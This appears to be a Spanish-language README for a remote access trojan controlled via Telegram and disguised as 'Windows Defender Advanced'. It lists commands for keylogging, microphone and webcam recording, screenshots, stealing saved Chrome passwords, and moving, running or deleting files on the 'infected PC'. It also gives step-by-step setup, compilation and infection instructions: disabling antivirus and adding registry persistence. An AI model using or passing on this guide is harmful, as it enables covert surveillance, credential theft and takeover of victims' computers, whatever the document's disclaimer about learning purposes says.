╔═══╦═══╦════╗ ╔════╗ ╔╗ ╔╗╔╗╔╗ ╔╗
║╔═╗║╔═╗║╔╗╔╗║ ║╔╗╔╗║ ║║ ║║║║║║ ║║
║╚═╝║║ ║╠╝║║╚╝╔╗╔╦╦══╗╚╝║║╠╩═╣║╔══╦══╦═╦══╦╗╔╗ ║║║║║╠╦═╗╔═╝╠══╦╗╔╗╔╦══╗
║╔╗╔╣╚═╝║ ║║ ║╚╝╠╣╔╗║ ║║║║═╣║║║═╣╔╗║╔╣╔╗║╚╝║ ║╚╝╚╝╠╣╔╗╣╔╗║╔╗║╚╝╚╝║══╣
║║║╚╣╔═╗║ ║║ ╚╗╔╣║╔╗║ ║║║║═╣╚╣║═╣╚╝║║║╔╗║║║║ ╚╗╔╗╔╣║║║║╚╝║╚╝╠╗╔╗╔╬══║
╚╝╚═╩╝ ╚╝ ╚╝ ╚╝╚╩╝╚╝ ╚╝╚══╩═╩══╩═╗╠╝╚╝╚╩╩╩╝ ╚╝╚╝╚╩╝╚╩══╩══╝╚╝╚╝╚══╝
╔═╝║
╚══╝ v 1.0.0
Nota: Éste proyecto tiene como finalidad el aprendizaje de ciberseguridad y hacking, no me hago responsable de un posible mal uso de ésta herramienta.
Read this documentation in English
- Fecha de documentación :
07/05/2020
- Versión: v
1.0.0
- Peso compilado:
45MB
aproximadamente - Versión Python:
3.7
(Obligatoriamente debe ser ésta versión) - Licencia:
MIT licence
Doc
= Contiene la documentación en inglesCompilar.bat
= Convierte el archivo*.py
a*.exe
Ejecutar.bat
= Ejecuta el RAT en consola, se muestra una consola.iconDefender.ico
= Icono Windows DefenderLICENCE
= Licenciaproxy.py
= librería*.py
, no mover ni modificarREADME.md
= Ésta DocumentaciónStartUp.reg
= Modifica el Registro de WindowsversionN.txt
= Información detalla de conversión*.py
a*.exe
WindowsDefenderAdvanced.py
= Código fuente del RAT via Telegram Windows
Nota: Si usted desea puede descargar el entorno virtual de python 3.7 con todas las librerías instaladas y usadas en éste proyecto aquí
Librerías utilizadas
- import
winshell
- import
tendo
- import
pypiwin32
- import
pyinstaller
- import
psutil
- import
pillow
- import
opencv-python
- import
sys
- import
threading
- import
datetime
- import
argparse
- import
logging
- import
socket
- import
select
Apaga la computadora de la [PC Infectada]
Graba desde el microfono de la [PC Infectada]
Ejemplo:
/audio [Tiempo en segundos]
/audio 45
Toma una captura de pantalla - [PC Infectada]
Navega entre carpetas - [PC Infectada]
Ejemplo:
/ir [Ruta entre comillas dobles y debe terminar con un "\"]
/ir "D:\SoftwarePortable\Android Studio\"
Muestra la lista de archivos que se encuentran en una carpeta - [PC Infectada]
Ejemplo:
/listar [Ruta entre comillas dobles y debe terminar con un "\"]
/listar "D:\SoftwarePortable\Android Studio\plugins\"
Muestra la información desde la DNS - [PC Infectada]
Copia un archivo de una carpeta a otra - [PC Infectada]
Ejemplo:
/copiar [Ruta entre comillas dobles y debe terminar con la extensión del archivo] [Ruta entre comillas dobles y debe terminar con la extensión del archivo]
/copiar "C:\Users\Anonymous\Documents\virus.exe" "C:\Users\Anonymous\Desktop\virus.exe"
Descarga un archivo - [PC Infectada]
Ejemplo:
/descargar [Ruta entre comillas dobles y debe terminar con la extensión del archivo]
/descargar "O:\OneDrive - xKx\Pictures\Developer Software\Website\logo.png"
Ejecuta un EXE - [PC Infectada]
Ejemplo:
/ejecutar [Ruta entre comillas dobles y debe terminar con la extensión del archivo]
/ejecutar "C:\Users\Public\virus.exe"
Elimina un archivo o carpeta - [PC Infectada]
Ejemplo:
/eliminar [Ruta entre comillas dobles y debe terminar con un "\" o con la extensión del archivo]
/eliminar "D:\Photos\FotosFamilia\"
/eliminar "D:\Photos\FotosFamilia\03122019.jpg"
Envía archivos de nuestra PC o celular a la [PC Infectada]
Ejemplo:
/enviar [Ruta entre comillas dobles y debe terminar con la extensión del archivo] [Ruta entre comillas dobles y debe terminar con la extensión del archivo]
/enviar "C:\Users\Anonymous\Documents\virus.exe" "C:\Users\Victima\Documents\NoEsvirus.exe"
Cambia fondo de pantalla - [PC Infectada]
Ejemplo:
/fondo C:/Users/User/Desktop/porn.jpg
Obtiene las contraseñas guardadas en Chrome - [PC Infectada]
Obtiene el registro de teclas - [PC Infectada]
Obtiene la información desde la IP [PC Infectada]
Mueve archivos - [PC Infectada]
Ejemplo:
/mover [Ruta entre comillas dobles y debe terminar con la extensión del archivo] [Ruta entre comillas dobles y debe terminar con la extensión del archivo]
/mover "C:\Users\Anonymous\Documents\virus.exe" "C:\Users\Anonymous\Desktop\virus.exe"
Crea - [PC Infectada]
Creo que abre un puerto a la victima. <= por verificar
Muestra información de la red- [PC Infectada]
Reinicia la computadora - [PC Infectada]
Muestra información de procesos - [PC Infectada]
Verifica si la [PC Infectada] se encuentra en linea
Muestra la ruta donde se encuentra el RAT
Abre un URL en el navegador predeterminado de
Ejemplo:
/web https://www.youtube.com/watch?v=ywGOLN0dDKU
/web https://www.xxx.com
Graba o toma foto de la webcam
NOTA: No probado, tampoco sé si la luz de la webCam se enciende.
Se está trabajando en las siguientes caracteristicas y se iran habilitando en las siguientes actualizaciones
Nota: Si usted desea puede descargar el entorno virtual de python 3.7 con todas las librerías instaladas y usadas en éste proyecto aquí
- Editar el archivo
WindowsDefenderAdvanced.py
- Creamos en GotFather un Bot y obtenemos nuestro token
- Entramos y agregamos nuestro token del bot
- lo que sigue despues es obtener el ID de nuestro chat, pero para eso necesitamos ua ejecutar nuestro RAT.
- Para ejecutarlo, busque el archivo
Ejecutar.bat
=> Y le damos a editar. - He insertamos la ruta donde se encuentra nuestro RAT
- Una vez terminado ya podemos ejecutar nuestro RAT y en la consola se verá algo así.
- Y en nuestro telegram tenemos que mandar un comando, para recibir nuestro ID del chat
- Y en nuestra consola aparecerá nuestro ID del chat
- Y este chat ID tenemos que escribirlo en el archivo
WindowsDefenderAdvanced.py
- Y listo, ahora nuestro RAT solo responderá a nuestro ID privado, nadie más podrá tener ese acceso. ya está listo para compilar.
- Busque el archivo
Compilar.bat
- => Clic derecho => Editar Y colocamos la ruta de la carpeta donde se encuentra el RAT
- => Guardamos => Ejecutamos para compilar...
- Listo, el RAT se compiló exitosamente.
¿Cómo infecto a la victima?
- Usten tendrá al finalizar 2 archivos:
- El archivo llamado
WindowsDefenderAdvanced.exe
que es el RAT - El archivo llamado
StartUp.reg
, modifica el registro de windows, y hace que elRAT
se ejecute siempre al iniciar el usuario.
Nota: No cambiar de nombre al archivo WindowsDefenderAdvanced.exe
, si usted le cambia de nombre, algunas funcionalidades , como la del troyano no se iniciarán.
- Usten guardará esos archivos en un USB
- Es necesario desactivar el antivirus o agregar una exclusión en al siguiente ruta:
"C:\Users\Public\Security\Windows Defender"
- Lo siguiente es ejecutar el archivo
WindowsDefenderAdvanced.exe
en el USB, el RAT se replicará en la siguiente ruta"C:\Users\Public\Security\Windows Defender"
, Se recomienda no sacar el USB al instante ya que el keylogger se estará replicando en la ruta. - Lo siguiente es darle 2 click al archiv
StartUp.reg
, y ésto hará que el registro de windows sea modificado y el keylogger se ejecute - Nota: No hay un orden fijo, usted puede ejecutar primero el archivo
WindowsDefenderAdvanced.exe
cómo el archivoStartUp.reg
y ésto no causará ningún problema.
- Repositorio Original: mvrozanti <== Es el creador original de éste repositorio.
- Repostitorio: Keylogger_Python <== Éste repositorio fue integrado en un 50% dentro de RAT_via_Telegram_Windows.